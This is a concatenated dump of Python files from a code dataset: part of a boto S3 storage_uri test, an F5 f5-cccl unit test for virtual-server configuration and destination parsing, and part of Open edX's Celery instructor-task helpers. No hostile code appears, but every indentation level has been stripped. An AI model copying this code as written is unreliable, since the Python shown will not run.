# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Some unit tests for StorageUri
"""
from tests.unit import unittest
import time
import boto
from boto.s3.connection import S3Connection, Location
class StorageUriTest(unittest.TestCase):
s3 = True
def nuke_bucket(self, bucket):
for key in bucket:
key.delete()
bucket.delete()
def test_storage_uri_regionless(self):
# First, create a bucket in a different region.
conn = S3Connection(
host='s3-us-west-2.amazonaws.com'
)
bucket_name = 'keytest-%d' % int(time.time())
bucket = conn.create_bucket(bucket_name, location=Location.USWest2)
self.addCleanup(self.nuke_bucket, bucket)
# Now use ``storage_uri`` to try to make a new key.
# This would throw a 301 exception.
suri = boto.storage_uri('s3://%s/test' % bucket_name)
the_key = suri.new_key()
the_key.key = 'Test301'
the_key.set_contents_from_string(
'This should store in a different region.'
)
# Check it a different way.
alt_conn = boto.connect_s3(host='s3-us-west-2.amazonaws.com')
alt_bucket = alt_conn.get_bucket(bucket_name)
alt_key = alt_bucket.get_key('Test301')
|
mit
|
f5devcentral/f5-cccl
|
f5_cccl/resource/ltm/test/test_virtual.py
|
1
|
13147
|
#!/usr/bin/env python
# Copyright (c) 2017-2021 F5 Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from copy import copy, deepcopy
from f5_cccl.resource.ltm.pool import Pool
from f5_cccl.resource.ltm.virtual import ApiVirtualServer
from f5_cccl.resource.ltm.virtual import IcrVirtualServer
from f5_cccl.resource.ltm.virtual import VirtualServer
from mock import Mock
import pytest
cfg_test = {
'name': 'Virtual-1',
'partition': 'my_partition',
'destination': '/Test/1.2.3.4%2:80',
'source': '10.0.0.1%2/32',
'pool': '/my_partition/pool1',
'ipProtocol': 'tcp',
'rules': ['Test/rule1', 'Test/rule2'],
'profiles': [
{'name': "tcp",
'partition': "Common",
'context': "all"}
],
'policies': [
{'name': "test_policy",
'partition': "my_partition"}
],
"enabled": True,
"vlansEnabled": True,
"vlans": ["/Test/vlan-100", "/Common/http-tunnel"],
"sourceAddressTranslation": {
"type": "snat",
"pool": "/Test/snatpool1"
},
'metadata': [{
'name': 'user_agent',
'persist': 'true',
'value': 'some-controller-v.1.4.0'
}]
}
@pytest.fixture
def bigip():
bigip = Mock()
return bigip
def test_create_virtual():
"""Test Virtual Server creation."""
virtual = VirtualServer(
default_route_domain=2,
**cfg_test
)
assert virtual
# verify all cfg items
for k,v in list(cfg_test.items()):
if k == "vlans" or k == "policies" or k == "rules":
assert virtual.data[k] == sorted(v)
else:
assert virtual.data[k] == v
def test_hash():
"""Test Virtual Server hash."""
virtual = VirtualServer(
default_route_domain=2,
**cfg_test
)
virtual1 = VirtualServer(
default_route_domain=2,
**cfg_test
)
cfg_changed = copy(cfg_test)
cfg_changed['name'] = 'test'
virtual2 = VirtualServer(
default_route_domain=2,
**cfg_changed
)
cfg_changed = copy(cfg_test)
cfg_changed['partition'] = 'other'
virtual3 = VirtualServer(
default_route_domain=2,
**cfg_changed
)
assert virtual
assert virtual1
assert virtual2
assert virtual3
assert hash(virtual) == hash(virtual1)
assert hash(virtual) != hash(virtual2)
assert hash(virtual) != hash(virtual3)
def test_eq():
"""Test Virtual Server equality."""
partition = 'Common'
name = 'virtual_1'
virtual = VirtualServer(
default_route_domain=2,
**deepcopy(cfg_test)
)
virtual2 = VirtualServer(
default_route_domain=2,
**deepcopy(cfg_test)
)
virtual3 = VirtualServer(
default_route_domain=2,
**deepcopy(cfg_test)
)
pool = Pool(
name=name,
partition=partition
)
assert virtual
assert virtual2
assert virtual3
assert virtual == virtual2
# remove profile context from Virtual2, should still be equal (because
# context is optional)
del virtual.data['profiles'][0]['context']
assert virtual == virtual2
# remove profile, now unequal
del virtual.data['profiles'][0]
assert virtual != virtual2
assert virtual3 == virtual2
# not equal
virtual2.data['destination'] = '/Test/1.2.3.4:8080'
assert virtual3 != virtual2
# different objects
assert virtual != pool
def test_uri_path(bigip):
"""Test Virtual Server URI."""
virtual = VirtualServer(
default_route_domain=2,
**cfg_test
)
assert virtual
assert virtual._uri_path(bigip) == bigip.tm.ltm.virtuals.virtual
def test_ipv4_destination():
"""Test Virtual Server destination."""
virtual = VirtualServer(
default_route_domain=2,
**cfg_test
)
assert virtual
destination = virtual.destination
assert destination
assert destination[0] == "/Test/1.2.3.4%2:80"
assert destination[1] == "Test"
assert destination[2] == "1.2.3.4%2"
assert destination[3] == "80"
cfg = copy(cfg_test)
cfg['destination'] = "/Test/1.2.3.4%2:80"
virtual = VirtualServer(
default_route_domain=2,
**cfg
)
destination = virtual.destination
assert destination[0] == "/Test/1.2.3.4%2:80"
assert destination[1] == "Test"
assert destination[2] == "1.2.3.4%2"
assert destination[3] == "80"
cfg = copy(cfg_test)
cfg['destination'] = "/Test/my_virtual_addr%2:80"
virtual = VirtualServer(
default_route_domain=2,
**cfg
)
destination = virtual.destination
assert destination[0] == "/Test/my_virtual_addr%2:80"
assert destination[1] == "Test"
assert destination[2] == "my_virtual_addr%2"
assert destination[3] == "80"
cfg = copy(cfg_test)
cfg['destination'] = "/Test_1/my_virtual_addr%2:80"
virtual = VirtualServer(
default_route_domain=2,
**cfg
)
destination = virtual.destination
assert destination[0] == "/Test_1/my_virtual_addr%2:80"
assert destination[1] == "Test_1"
assert destination[2] == "my_virtual_addr%2"
assert destination[3] == "80"
cfg = copy(cfg_test)
cfg['destination'] = "/Test-1/my_virtual_addr%2:80"
virtual = VirtualServer(
default_route_domain=2,
**cfg
)
destination = virtual.destination
assert destination[0] == "/Test-1/my_virtual_addr%2:80"
assert destination[1] == "Test-1"
assert destination[2] == "my_virtual_addr%2"
assert destination[3] == "80"
cfg = copy(cfg_test)
cfg['destination'] = "/Test.1/my_virtual_addr%2:80"
virtual = VirtualServer(
default_route_domain=2,
**cfg
)
destination = virtual.destination
assert destination[0] == "/Test.1/my_virtual_addr%2:80"
assert destination[1] == "Test.1"
assert destination[2] == "my_virtual_addr%2"
assert destination[3] == "80"
def test_ipv6_destination():
cfg = copy(cfg_test)
cfg['destination'] = "/Test_1/2001::1%2.80"
virtual = VirtualServer(
default_route_domain=2,
**cfg
)
destination = virtual.destination
assert destination[0] == "/Test_1/2001::1%2.80"
assert destination[1] == "Test_1"
assert destination[2] == "2001::1%2"
assert destination[3] == "80"
cfg = copy(cfg_test)
cfg['destination'] = "/Test/2001:0db8:85a3:0000:0000:8a2e:0370:7334.80"
virtual = VirtualServer(
default_route_domain=2,
**cfg
)
destination = virtual.destination
assert destination[0] == "/Test/2001:0db8:85a3:0000:0000:8a2e:0370:7334%2.80"
assert destination[1] == "Test"
assert destination[2] == "2001:0db8:85a3:0000:0000:8a2e:0370:7334%2"
assert destination[3] == "80"
cfg = copy(cfg_test)
cfg['destination'] = "/Test/2001:0db8:85a3::8a2e:0370:7334.80"
virtual = VirtualServer(
default_route_domain=2,
**cfg
)
destination = virtual.destination
assert destination[0] == "/Test/2001:0db8:85a3::8a2e:0370:7334%2.80"
assert destination[1] == "Test"
assert destination[2] == "2001:0db8:85a3::8a2e:0370:7334%2"
assert destination[3] == "80"
# Negative matches
cfg = copy(cfg_test)
cfg['destination'] = "Test/2001:0db8:85a3::8a2e:0370:7334.80"
virtual = VirtualServer(
default_route_domain=2,
**cfg
)
destination = virtual.destination
assert destination[0] == "Test/2001:0db8:85a3::8a2e:0370:7334.80"
assert not destination[1]
assert not destination[2]
assert not destination[3]
# Negative matches
cfg = copy(cfg_test)
cfg['destination'] = "/Test/2001:0db8:85a3::8a2e:0370:7334%3:80"
virtual = VirtualServer(
default_route_domain=2,
**cfg
)
destination = virtual.destination
assert destination[0] == "/Test/2001:0db8:85a3::8a2e:0370:7334%3:80"
assert not destination[1]
assert not destination[2]
assert not destination[3]
cfg_test_api_virtual = {
'name': 'Virtual-1',
'partition': 'my_partition',
'destination': '/Test/1.2.3.4:80',
'source': '10.0.0.1/32',
'pool': '/my_partition/pool1',
'ipProtocol': 'tcp',
'rules': ['Test/rule1', 'Test/rule2'],
'profiles': [
{'name': "tcp",
'partition': "Common",
'context': "all"}
],
'policies': [
{'name': "test_policy",
'partition': "my_partition"}
],
"vlansEnabled": True,
"vlans": ["/Test/vlan-100", "/Common/http-tunnel"],
"sourceAddressTranslation": {
"type": "snat",
"pool": "/Test/snatpool1"
},
'metadata': [{
'name': 'user_agent',
'persist': 'true',
'value': 'some-controller-v.1.4.0'
}]
}
def test_create_api_virtual():
"""Test Virtual Server creation."""
virtual = ApiVirtualServer(
default_route_domain=2,
**cfg_test_api_virtual
)
assert virtual
# verify all cfg items
for k,v in list(cfg_test.items()):
if k == "vlans" or k == 'policies' or k == "rules":
assert virtual.data[k] == sorted(v)
else:
assert virtual.data[k] == v
assert virtual.data['enabled']
assert 'disabled' not in virtual.data
cfg_test_api_virtual['enabled'] = False
virtual = ApiVirtualServer(
default_route_domain=2,
**cfg_test_api_virtual
)
assert virtual
assert 'enabled' not in virtual.data
assert virtual.data['disabled']
cfg_test_api_virtual['enabled'] = True
cfg_test_api_virtual.pop('vlansEnabled', None)
virtual = ApiVirtualServer(
default_route_domain=2,
**cfg_test_api_virtual
)
assert virtual
assert 'vlansEnabled' not in virtual.data
assert virtual.data['vlansDisabled']
cfg_test_icr_virtual = {
"addressStatus": "yes",
"autoLasthop": "default",
"cmpEnabled": "yes",
"connectionLimit": 0,
"destination": "/Common/10.190.1.2:443",
"enabled": True,
"fullPath": "/Common/virtual1",
"generation": 15839,
"gtmScore": 0,
"ipProtocol": "tcp",
"kind": "tm:ltm:virtual:virtualstate",
"mask": "255.255.255.255",
"mirror": "disabled",
"mobileAppTunnel": "disabled",
"name": "virtual1",
"nat64": "disabled",
"partition": "Common",
"policiesReference": {
"isSubcollection": True,
"link": "https://localhost/mgmt/tm/ltm/virtual/~Common~virtual1/policies?ver=12.1.0",
"items": [
{
"kind": "tm:ltm:virtual:policies:policiesstate",
"name": "wrapper_policy",
"partition": "Test",
"fullPath": "/Test/wrapper_policy",
"generation": 7538,
"selfLink": "https://localhost/mgmt/tm/ltm/virtual/~Test~vs1/policies/~Test~wrapper_policy?ver=12.1.1",
"nameReference": {
"link": "https://localhost/mgmt/tm/ltm/policy/~Test~wrapper_policy?ver=12.1.1"
}
}
]
},
"pool": "/Common/test_pool",
"poolReference": {
"link": "https://localhost/mgmt/tm/ltm/pool/~Common~test_pool?ver=12.1.0"
},
"profilesReference": {
"isSubcollection": True,
"link": "https://localhost/mgmt/tm/ltm/virtual/~Common~virtual1/profiles?ver=12.1.0",
"items": [
{
"kind": "tm:ltm:virtual:profiles:profilesstate",
"name": "clientssl",
"partition": "Common",
"fullPath": "/Common/clientssl",
"generation": 7538,
"selfLink": "https://localhost/mgmt/tm/ltm/virtual/~Test~vs1/profiles/~Common~clientssl?ver=12.1.1",
"context": "clientside",
"nameReference": {
"link": "https://localhost/mgmt/tm/ltm/profile/client-ssl/~Common~clientssl?ver=12.1.1"
}
}
]
},
"rateLimit": "disabled",
"rateLimitDstMask": 0,
"rateLimitMode": "object",
"rateLimitSrcMask": 0,
"selfLink": "https://localhost/mgmt/tm/ltm/virtual/~Common~virtual1?ver=12.1.0",
"serviceDownImmediateAction": "none",
"source": "0.0.0.0/0",
"sourceAddressTranslation": {
"type": "none"
},
"sourcePort": "preserve",
"synCookieStatus": "not-activated",
"translateAddress": "enabled",
"translatePort": "enabled",
"vlansDisabled": True,
"vsIndex": 111
}
def test_create_icr_virtual():
"""Test Virtual Server creation."""
virtual = IcrVirtualServer(
default_route_domain=2,
**cfg_test_icr_virtual
)
assert virtual
|
apache-2.0
|
Learningtribes/edx-platform
|
lms/djangoapps/instructor_task/tasks_helper.py
|
6
|
74119
|
"""
This file contains tasks that are designed to perform background operations on the
running state of a course.
"""
import json
import re
from collections import OrderedDict
from datetime import datetime
from django.conf import settings
from eventtracking import tracker
from itertools import chain
from time import time
import unicodecsv
import logging
from celery import Task, current_task
from celery.states import SUCCESS, FAILURE
from django.contrib.auth.models import User
from django.core.files.storage import DefaultStorage
from django.db import reset_queries
from django.db.models import Q
import dogstats_wrapper as dog_stats_api
from pytz import UTC
from StringIO import StringIO
from edxmako.shortcuts import render_to_string
from instructor.paidcourse_enrollment_report import PaidCourseEnrollmentReportProvider
from shoppingcart.models import (
PaidCourseRegistration, CourseRegCodeItem, InvoiceTransaction,
Invoice, CouponRedemption, RegistrationCodeRedemption, CourseRegistrationCode
)
from survey.models import SurveyAnswer
from track.views import task_track
from util.db import outer_atomic
from util.file import course_filename_prefix_generator, UniversalNewlineIterator
from xblock.runtime import KvsFieldData
from xmodule.modulestore.django import modulestore
from xmodule.split_test_module import get_split_user_partitions
from django.utils.translation import ugettext as _
from certificates.models import (
CertificateWhitelist,
certificate_info_for_user,
CertificateStatuses,
GeneratedCertificate
)
from certificates.api import generate_user_certificates
from courseware.courses import get_course_by_id, get_problems_in_section
from courseware.grades import iterate_grades_for
from courseware.models import StudentModule
from courseware.model_data import DjangoKeyValueStore, FieldDataCache
from courseware.module_render import get_module_for_descriptor_internal
from instructor_analytics.basic import (
enrolled_students_features,
get_proctored_exam_results,
list_may_enroll,
list_problem_responses
)
from instructor_analytics.csvs import format_dictlist
from openassessment.data import OraAggregateData
from instructor_task.models import ReportStore, InstructorTask, PROGRESS
from lms.djangoapps.lms_xblock.runtime import LmsPartitionService
from openedx.core.djangoapps.course_groups.cohorts import get_cohort
from openedx.core.djangoapps.course_groups.models import CourseUserGroup
from openedx.core.djangoapps.content.course_structures.models import CourseStructure
from opaque_keys.edx.keys import UsageKey
from openedx.core.djangoapps.course_groups.cohorts import add_user_to_cohort, is_course_cohorted
from student.models import CourseEnrollment, CourseAccessRole
from lms.djangoapps.teams.models import CourseTeamMembership
from lms.djangoapps.verify_student.models import SoftwareSecurePhotoVerification
# define different loggers for use within tasks and on client side
TASK_LOG = logging.getLogger('edx.celery.task')
# define value to use when no task_id is provided:
UNKNOWN_TASK_ID = 'unknown-task_id'
FILTERED_OUT_ROLES = ['staff', 'instructor', 'finance_admin', 'sales_admin']
# define values for update functions to use to return status to perform_module_state_update
UPDATE_STATUS_SUCCEEDED = 'succeeded'
UPDATE_STATUS_FAILED = 'failed'
UPDATE_STATUS_SKIPPED = 'skipped'
# The setting name used for events when "settings" (account settings, preferences, profile information) change.
REPORT_REQUESTED_EVENT_NAME = u'edx.instructor.report.requested'
class BaseInstructorTask(Task):
"""
Base task class for use with InstructorTask models.
Permits updating information about task in corresponding InstructorTask for monitoring purposes.
Assumes that the entry_id of the InstructorTask model is the first argument to the task.
The `entry_id` is the primary key for the InstructorTask entry representing the task. This class
updates the entry on success and failure of the task it wraps. It is setting the entry's value
for task_state based on what Celery would set it to once the task returns to Celery:
FAILURE if an exception is encountered, and SUCCESS if it returns normally.
Other arguments are pass-throughs to perform_module_state_update, and documented there.
"""
abstract = True
def on_success(self, task_progress, task_id, args, kwargs):
"""
Update InstructorTask object corresponding to this task with info about success.
Updates task_output and task_state. But it shouldn't actually do anything
if the task is only creating subtasks to actually do the work.
Assumes `task_progress` is a dict containing the task's result, with the following keys:
'attempted': number of attempts made
'succeeded': number of attempts that "succeeded"
'skipped': number of attempts that "skipped"
'failed': number of attempts that "failed"
'total': number of possible subtasks to attempt
'action_name': user-visible verb to use in status messages. Should be past-tense.
Pass-through of input `action_name`.
'duration_ms': how long the task has (or had) been running.
This is JSON-serialized and stored in the task_output column of the InstructorTask entry.
"""
TASK_LOG.debug('Task %s: success returned with progress: %s', task_id, task_progress)
# We should be able to find the InstructorTask object to update
# based on the task_id here, without having to dig into the
# original args to the task. On the other hand, the entry_id
# is the first value passed to all such args, so we'll use that.
# And we assume that it exists, else we would already have had a failure.
entry_id = args[0]
entry = InstructorTask.objects.get(pk=entry_id)
# Check to see if any subtasks had been defined as part of this task.
# If not, then we know that we're done. (If so, let the subtasks
# handle updating task_state themselves.)
if len(entry.subtasks) == 0:
entry.task_output = InstructorTask.create_output_for_success(task_progress)
entry.task_state = SUCCESS
entry.save_now()
def on_failure(self, exc, task_id, args, kwargs, einfo):
"""
Update InstructorTask object corresponding to this task with info about failure.
Fetches and updates exception and traceback information on failure.
If an exception is raised internal to the task, it is caught by celery and provided here.
The information is recorded in the InstructorTask object as a JSON-serialized dict
stored in the task_output column. It contains the following keys:
'exception': type of exception object
'message': error message from exception object
'traceback': traceback information (truncated if necessary)
Note that there is no way to record progress made within the task (e.g. attempted,
succeeded, etc.) when such failures occur.
"""
TASK_LOG.debug(u'Task %s: failure returned', task_id)
entry_id = args[0]
try:
entry = InstructorTask.objects.get(pk=entry_id)
except InstructorTask.DoesNotExist:
# if the InstructorTask object does not exist, then there's no point
# trying to update it.
TASK_LOG.error(u"Task (%s) has no InstructorTask object for id %s", task_id, entry_id)
else:
TASK_LOG.warning(u"Task (%s) failed", task_id, exc_info=True)
entry.task_output = InstructorTask.create_output_for_failure(einfo.exception, einfo.traceback)
entry.task_state = FAILURE
entry.save_now()
class UpdateProblemModuleStateError(Exception):
"""
Error signaling a fatal condition while updating problem modules.
Used when the current module cannot be processed and no more
modules should be attempted.
"""
pass
def _get_current_task():
"""
Stub to make it easier to test without actually running Celery.
This is a wrapper around celery.current_task, which provides access
to the top of the stack of Celery's tasks. When running tests, however,
it doesn't seem to work to mock current_task directly, so this wrapper
is used to provide a hook to mock in tests, while providing the real
`current_task` in production.
"""
return current_task
class TaskProgress(object):
"""
Encapsulates the current task's progress by keeping track of
'attempted', 'succeeded', 'skipped', 'failed', 'total',
'action_name', and 'duration_ms' values.
"""
def __init__(self, action_name, total, start_time):
self.action_name = action_name
self.total = total
self.start_time = start_time
self.attempted = 0
self.succeeded = 0
self.skipped = 0
self.failed = 0
def update_task_state(self, extra_meta=None):
"""
Update the current celery task's state to the progress state
specified by the current object. Returns the progress
dictionary for use by `run_main_task` and
`BaseInstructorTask.on_success`.
Arguments:
extra_meta (dict): Extra metadata to pass to `update_state`
Returns:
dict: The current task's progress dict
"""
progress_dict = {
'action_name': self.action_name,
'attempted': self.attempted,
'succeeded': self.succeeded,
'skipped': self.skipped,
'failed': self.failed,
'total': self.total,
'duration_ms': int((time() - self.start_time) * 1000),
}
if extra_meta is not None:
progress_dict.update(extra_meta)
_get_current_task().update_state(state=PROGRESS, meta=progress_dict)
return progress_dict
def run_main_task(entry_id, task_fcn, action_name):
"""
Applies the `task_fcn` to the arguments defined in `entry_id` InstructorTask.
Arguments passed to `task_fcn` are:
`entry_id` : the primary key for the InstructorTask entry representing the task.
`course_id` : the id for the course.
`task_input` : dict containing task-specific arguments, JSON-decoded from InstructorTask's task_input.
`action_name` : past-tense verb to use for constructing status messages.
If no exceptions are raised, the `task_fcn` should return a dict containing
the task's result with the following keys:
'attempted': number of attempts made
'succeeded': number of attempts that "succeeded"
'skipped': number of attempts that "skipped"
'failed': number of attempts that "failed"
'total': number of possible subtasks to attempt
'action_name': user-visible verb to use in status messages.
Should be past-tense. Pass-through of input `action_name`.
'duration_ms': how long the task has (or had) been running.
"""
# Get the InstructorTask to be updated. If this fails then let the exception return to Celery.
# There's no point in catching it here.
with outer_atomic():
entry = InstructorTask.objects.get(pk=entry_id)
entry.task_state = PROGRESS
entry.save_now()
# Get inputs to use in this task from the entry
task_id = entry.task_id
course_id = entry.course_id
task_input = json.loads(entry.task_input)
# Construct log message
fmt = u'Task: {task_id}, InstructorTask ID: {entry_id}, Course: {course_id}, Input: {task_input}'
task_info_string = fmt.format(task_id=task_id, entry_id=entry_id, course_id=course_id, task_input=task_input)
TASK_LOG.info(u'%s, Starting update (nothing %s yet)', task_info_string, action_name)
# Check that the task_id submitted in the InstructorTask matches the current task
# that is running.
request_task_id = _get_current_task().request.id
if task_id != request_task_id:
fmt = u'{task_info}, Requested task did not match actual task "{actual_id}"'
message = fmt.format(task_info=task_info_string, actual_id=request_task_id)
TASK_LOG.error(message)
raise ValueError(message)
# Now do the work
with dog_stats_api.timer('instructor_tasks.time.overall', tags=[u'action:{name}'.format(name=action_name)]):
task_progress = task_fcn(entry_id, course_id, task_input, action_name)
# Release any queries that the connection has been hanging onto
reset_queries()
# Log and exit, returning task_progress info as task result
TASK_LOG.info(u'%s, Task type: %s, Finishing task: %s', task_info_string, action_name, task_progress)
return task_progress
def perform_module_state_update(update_fcn, filter_fcn, _entry_id, course_id, task_input, action_name):
"""
Performs generic update by visiting StudentModule instances with the update_fcn provided.
StudentModule instances are those that match the specified `course_id` and `module_state_key`.
If `student_identifier` is not None, it is used as an additional filter to limit the modules to those belonging
to that student. If `student_identifier` is None, performs update on modules for all students on the specified problem.
If a `filter_fcn` is not None, it is applied to the query that has been constructed. It takes one
argument, which is the query being filtered, and returns the filtered version of the query.
The `update_fcn` is called on each StudentModule that passes the resulting filtering.
It is passed three arguments: the module_descriptor for the module pointed to by the
module_state_key, the particular StudentModule to update, and the xmodule_instance_args being
passed through. If the value returned by the update function evaluates to a boolean True,
the update is successful; False indicates the update on the particular student module failed.
A raised exception indicates a fatal condition -- that no other student modules should be considered.
The return value is a dict containing the task's results, with the following keys:
'attempted': number of attempts made
'succeeded': number of attempts that "succeeded"
'skipped': number of attempts that "skipped"
'failed': number of attempts that "failed"
'total': number of possible updates to attempt
'action_name': user-visible verb to use in status messages. Should be past-tense.
Pass-through of input `action_name`.
'duration_ms': how long the task has (or had) been running.
Because this is run internal to a task, it does not catch exceptions. These are allowed to pass up to the
next level, so that it can set the failure modes and capture the error trace in the InstructorTask and the
result object.
"""
start_time = time()
usage_keys = []
problem_url = task_input.get('problem_url')
entrance_exam_url = task_input.get('entrance_exam_url')
student_identifier = task_input.get('student')
problems = {}
# if problem_url is present make a usage key from it
if problem_url:
usage_key = course_id.make_usage_key_from_deprecated_string(problem_url)
usage_keys.append(usage_key)
# find the problem descriptor:
problem_descriptor = modulestore().get_item(usage_key)
problems[unicode(usage_key)] = problem_descriptor
# if entrance_exam is present grab all problems in it
if entrance_exam_url:
problems = get_problems_in_section(entrance_exam_url)
usage_keys = [UsageKey.from_string(location) for location in problems.keys()]
# find the modules in question
modules_to_update = StudentModule.objects.filter(course_id=course_id, module_state_key__in=usage_keys)
# give the option of updating an individual student. If not specified,
# then updates all students who have responded to a problem so far
student = None
if student_identifier is not None:
# if an identifier is supplied, then look for the student,
# and let it throw an exception if none is found.
if "@" in student_identifier:
student = User.objects.get(email=student_identifier)
elif student_identifier is not None:
student = User.objects.get(username=student_identifier)
if student is not None:
modules_to_update = modules_to_update.filter(student_id=student.id)
if filter_fcn is not None:
modules_to_update = filter_fcn(modules_to_update)
task_progress = TaskProgress(action_name, modules_to_update.count(), start_time)
task_progress.update_task_state()
for module_to_update in modules_to_update:
task_progress.attempted += 1
module_descriptor = problems[unicode(module_to_update.module_state_key)]
# There is no try here: if there's an error, we let it throw, and the task will
# be marked as FAILED, with a stack trace.
with dog_stats_api.timer('instructor_tasks.module.time.step', tags=[u'action:{name}'.format(name=action_name)]):
update_status = update_fcn(module_descriptor, module_to_update)
if update_status == UPDATE_STATUS_SUCCEEDED:
# If the update_fcn returns true, then it performed some kind of work.
# Logging of failures is left to the update_fcn itself.
task_progress.succeeded += 1
elif update_status == UPDATE_STATUS_FAILED:
task_progress.failed += 1
elif update_status == UPDATE_STATUS_SKIPPED:
task_progress.skipped += 1
else:
raise UpdateProblemModuleStateError("Unexpected update_status returned: {}".format(update_status))
return task_progress.update_task_state()
def _get_task_id_from_xmodule_args(xmodule_instance_args):
"""Gets task_id from `xmodule_instance_args` dict, or returns default value if missing."""
return xmodule_instance_args.get('task_id', UNKNOWN_TASK_ID) if xmodule_instance_args is not None else UNKNOWN_TASK_ID
def _get_xqueue_callback_url_prefix(xmodule_instance_args):
"""Gets prefix to use when constructing xqueue_callback_url."""
return xmodule_instance_args.get('xqueue_callback_url_prefix', '') if xmodule_instance_args is not None else ''
def _get_track_function_for_task(student, xmodule_instance_args=None, source_page='x_module_task'):
"""
Make a tracking function that logs what happened.
For insertion into ModuleSystem, and used by CapaModule, which will
provide the event_type (as string) and event (as dict) as arguments.
The request_info and task_info (and page) are provided here.
"""
# get request-related tracking information from args passthrough, and supplement with task-specific
# information:
request_info = xmodule_instance_args.get('request_info', {}) if xmodule_instance_args is not None else {}
task_info = {'student': student.username, 'task_id': _get_task_id_from_xmodule_args(xmodule_instance_args)}
return lambda event_type, event: task_track(request_info, task_info, event_type, event, page=source_page)
def _get_module_instance_for_task(course_id, student, module_descriptor, xmodule_instance_args=None,
grade_bucket_type=None, course=None):
"""
Fetches a StudentModule instance for a given `course_id`, `student` object, and `module_descriptor`.
`xmodule_instance_args` is used to provide information for creating a track function and an XQueue callback.
These are passed, along with `grade_bucket_type`, to get_module_for_descriptor_internal, which sidesteps
the need for a Request object when instantiating an xmodule instance.
"""
# reconstitute the problem's corresponding XModule:
field_data_cache = FieldDataCache.cache_for_descriptor_descendents(course_id, student, module_descriptor)
student_data = KvsFieldData(DjangoKeyValueStore(field_data_cache))
# get request-related tracking information from args passthrough, and supplement with task-specific
# information:
request_info = xmodule_instance_args.get('request_info', {}) if xmodule_instance_args is not None else {}
task_info = {"student": student.username, "task_id": _get_task_id_from_xmodule_args(xmodule_instance_args)}
def make_track_function():
'''
Make a tracking function that logs what happened.
For insertion into ModuleSystem, and used by CapaModule, which will
provide the event_type (as string) and event (as dict) as arguments.
The request_info and task_info (and page) are provided here.
'''
return lambda event_type, event: task_track(request_info, task_info, event_type, event, page='x_module_task')
xqueue_callback_url_prefix = xmodule_instance_args.get('xqueue_callback_url_prefix', '') \
if xmodule_instance_args is not None else ''
return get_module_for_descriptor_internal(
user=student,
descriptor=module_descriptor,
student_data=student_data,
course_id=course_id,
track_function=make_track_function(),
xqueue_callback_url_prefix=xqueue_callback_url_prefix,
grade_bucket_type=grade_bucket_type,
# This module isn't being used for front-end rendering
request_token=None,
# pass in a loaded course for override enabling
course=course
)
@outer_atomic
def rescore_problem_module_state(xmodule_instance_args, module_descriptor, student_module):
'''
Takes an XModule descriptor and a corresponding StudentModule object, and
performs rescoring on the student's problem submission.
Throws exceptions if the rescoring is fatal and should be aborted if in a loop.
In particular, raises UpdateProblemModuleStateError if module fails to instantiate,
or if the module doesn't support rescoring.
Returns True if problem was successfully rescored for the given student, and False
if problem encountered some kind of error in rescoring.
'''
# unpack the StudentModule:
course_id = student_module.course_id
student = student_module.student
usage_key = student_module.module_state_key
with modulestore().bulk_operations(course_id):
course = get_course_by_id(course_id)
# TODO: Here is a call site where we could pass in a loaded course. I
# think we certainly need it since grading is happening here, and field
# overrides would be important in handling that correctly
instance = _get_module_instance_for_task(
course_id,
student,
module_descriptor,
xmodule_instance_args,
grade_bucket_type='rescore',
course=course
)
if instance is None:
# Either permissions just changed, or someone is trying to be clever
# and load something they shouldn't have access to.
msg = "No module {loc} for student {student}--access denied?".format(
loc=usage_key,
student=student
)
TASK_LOG.debug(msg)
raise UpdateProblemModuleStateError(msg)
if not hasattr(instance, 'rescore_problem'):
# This should also not happen, since it should be already checked in the caller,
# but check here to be sure.
msg = "Specified problem does not support rescoring."
raise UpdateProblemModuleStateError(msg)
result = instance.rescore_problem()
instance.save()
if 'success' not in result:
# don't consider these fatal, but false means that the individual call didn't complete:
TASK_LOG.warning(
u"error processing rescore call for course %(course)s, problem %(loc)s "
u"and student %(student)s: unexpected response %(msg)s",
dict(
msg=result,
course=course_id,
loc=usage_key,
student=student
)
)
return UPDATE_STATUS_FAILED
elif result['success'] not in ['correct', 'incorrect']:
TASK_LOG.warning(
u"error processing rescore call for course %(course)s, problem %(loc)s "
u"and student %(student)s: %(msg)s",
dict(
msg=result['success'],
course=course_id,
loc=usage_key,
student=student
)
)
return UPDATE_STATUS_FAILED
else:
TASK_LOG.debug(
u"successfully processed rescore call for course %(course)s, problem %(loc)s "
u"and student %(student)s: %(msg)s",
dict(
msg=result['success'],
course=course_id,
loc=usage_key,
student=student
)
)
return UPDATE_STATUS_SUCCEEDED
@outer_atomic
def reset_attempts_module_state(xmodule_instance_args, _module_descriptor, student_module):
"""
Resets problem attempts to zero for specified `student_module`.
Returns a status of UPDATE_STATUS_SUCCEEDED if a problem has non-zero attempts
that are being reset, and UPDATE_STATUS_SKIPPED otherwise.
"""
update_status = UPDATE_STATUS_SKIPPED
problem_state = json.loads(student_module.state) if student_module.state else {}
if 'attempts' in problem_state:
old_number_of_attempts = problem_state["attempts"]
if old_number_of_attempts > 0:
problem_state["attempts"] = 0
# convert back to json and save
student_module.state = json.dumps(problem_state)
student_module.save()
# get request-related tracking information from args passthrough,
# and supplement with task-specific information:
track_function = _get_track_function_for_task(student_module.student, xmodule_instance_args)
event_info = {"old_attempts": old_number_of_attempts, "new_attempts": 0}
track_function('problem_reset_attempts', event_info)
update_status = UPDATE_STATUS_SUCCEEDED
return update_status
@outer_atomic
def delete_problem_module_state(xmodule_instance_args, _module_descriptor, student_module):
"""
Delete the StudentModule entry.
Always returns UPDATE_STATUS_SUCCEEDED, indicating success, if it doesn't raise an exception due to database error.
"""
student_module.delete()
# get request-related tracking information from args passthrough,
# and supplement with task-specific information:
track_function = _get_track_function_for_task(student_module.student, xmodule_instance_args)
track_function('problem_delete_state', {})
